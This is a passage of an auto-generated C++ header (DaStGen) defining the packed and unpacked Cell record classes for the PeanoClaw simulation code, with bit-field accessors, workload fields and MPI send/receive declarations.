packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #elif defined(Parallel) && !defined(Debug) && !defined(SharedMemoryParallelisation) /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::Cell { public: typedef peanoclaw::records::CellPacked Packed; enum State { Leaf = 0, Refined = 1, Root = 2 }; struct PersistentRecords { int _cellDescriptionIndex; bool _isInside; State _state; #ifdef UseManualAlignment std::bitset<DIMENSIONS> _evenFlags __attribute__((aligned(VectorisationAlignment))); #else std::bitset<DIMENSIONS> _evenFlags; #endif #ifdef UseManualAlignment tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber __attribute__((aligned(VectorisationAlignment))); #else tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; #endif int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; bool _cellIsAForkCandidate; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _evenFlags = (evenFlags); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellIsAForkCandidate = cellIsAForkCandidate; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ Cell(); /** * Generated */ Cell(const PersistentRecords& persistentRecords); /** * Generated */ Cell(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); /** * Generated */ virtual ~Cell(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._isInside; } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._isInside = isInside; } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._state; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._state = state; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._evenFlags; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._evenFlags = (evenFlags); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); return _persistentRecords._evenFlags[elementIndex]; } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags[elementIndex]= evenFlags; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); _persistentRecords._evenFlags.flip(elementIndex); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._responsibleRank = responsibleRank; } inline bool getSubtreeHoldsWorker() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._subtreeHoldsWorker; } inline void setSubtreeHoldsWorker(const bool& subtreeHoldsWorker) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._subtreeHoldsWorker = subtreeHoldsWorker; } inline double getNodeWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._nodeWorkload; } inline void setNodeWorkload(const double& nodeWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._nodeWorkload = nodeWorkload; } inline double getLocalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._localWorkload; } inline void setLocalWorkload(const double& localWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._localWorkload = localWorkload; } inline double getTotalWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._totalWorkload; } inline void setTotalWorkload(const double& totalWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._totalWorkload = totalWorkload; } inline double getMaxWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._maxWorkload; } inline void setMaxWorkload(const double& maxWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._maxWorkload = maxWorkload; } inline double getMinWorkload() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._minWorkload; } inline void setMinWorkload(const double& minWorkload) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._minWorkload = minWorkload; } inline bool getCellIsAForkCandidate() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellIsAForkCandidate; } inline void setCellIsAForkCandidate(const bool& cellIsAForkCandidate) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellIsAForkCandidate = cellIsAForkCandidate; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _responsibleRank; bool _subtreeHoldsWorker; double _nodeWorkload; double _localWorkload; double _totalWorkload; double _maxWorkload; double _minWorkload; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS | cellIsAForkCandidate | startbit DIMENSIONS + 3 | #bits 1 */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& responsibleRank, const bool& subtreeHoldsWorker, const double& nodeWorkload, const double& localWorkload, const double& totalWorkload, const double& maxWorkload, const double& minWorkload, const bool& cellIsAForkCandidate); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getResponsibleRank() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _responsibleRank; } inline void setResponsibleRank(const int& responsibleRank) 